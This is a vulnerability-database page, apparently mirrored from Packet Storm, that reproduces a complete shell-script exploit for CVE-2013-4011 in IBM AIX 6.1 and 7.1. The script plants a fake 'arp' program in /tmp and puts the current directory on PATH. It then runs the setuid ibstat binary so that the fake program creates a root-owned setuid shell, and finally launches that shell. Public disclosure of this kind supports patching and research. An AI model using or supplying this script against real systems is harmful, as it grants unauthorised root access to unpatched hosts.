Lucene search
K

IBM AIX 6.1 / 7.1 Local Root Privilege Escalation

🗓️ 24 Sep 2013 00:00:00Reported by Kristian HermansenType 
packetstorm
 packetstorm
🔗 packetstormsecurity.com👁 41 Views

IBM AIX 6.1/7.1 Local Root Privilege Escalation by Kristian Erik Hermanse

Related
Code
`#!/bin/sh  
# Exploit Title: IBM AIX 6.1 / 7.1 local root privilege escalation  
# Date: 2013-09-24  
# Exploit Author: Kristian Erik Hermansen <[email protected]>  
# Vendor Homepage: http://www.ibm.com  
# Software Link: http://www-03.ibm.com/systems/power/software/aix/about.html  
# Version: IBM AIX 6.1 and 7.1, and VIOS 2.2.2.2-FP-26 SP-02  
# Tested on: IBM AIX 6.1  
# CVE: CVE-2013-4011  
echo '  
mm mmmmm m m  
## # # #  
# # # ##   
#mm# # m""m  
# # mm#mm m" "m  
'  
echo "[*] AIX root privilege escalation"  
echo "[*] Kristian Erik Hermansen"  
echo "[*] https://linkedin.com/in/kristianhermansen"  
echo "  
+++++?????????????~.:,.:+???????????++++  
+++++???????????+...:.,.,.=??????????+++  
+++???????????~.,:~=~:::..,.~?????????++  
+++???????????:,~==++++==~,,.?????????++  
+++???????????,:=+++++++=~:,,~????????++  
++++?????????+,~~=++++++=~:,,:????????++  
+++++????????~,~===~=+~,,::,:+???????+++  
++++++???????=~===++~~~+,,~::???????++++  
++++++++?????=~=+++~~~:++=~:~+???+++++++  
+++++++++????~~=+++~+=~===~~:+??++++++++  
+++++++++?????~~=====~~==~:,:?++++++++++  
++++++++++????+~==:::::=~:,+??++++++++++  
++++++++++?????:~~=~~~~~::,??+++++++++++  
++++++++++?????=~:~===~,,,????++++++++++  
++++++++++???+:==~:,,.:~~..+??++++++++++  
+++++++++++....==+===~~=~,...=?+++++++++  
++++++++,........~=====..........+++++++  
+++++................................++=  
=+:....................................=  
"  
TMPDIR=/tmp  
TAINT=${TMPDIR}/arp  
RSHELL=${TMPDIR}/r00t-sh  
  
cat > ${TAINT} <<-!  
#!/bin/sh  
cp /bin/sh ${RSHELL}  
chown root ${RSHELL}  
chmod 4555 ${RSHELL}  
!  
  
chmod 755 ${TAINT}  
PATH=.:${PATH}  
export PATH  
cd ${TMPDIR}  
/usr/bin/ibstat -a -i en0 2>/dev/null >/dev/null  
if [ -e ${RSHELL} ]; then  
echo "[+] Access granted. Don't be evil..."  
${RSHELL}  
else  
echo "[-] Exploit failed. Try some 0day instead..."  
fi  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation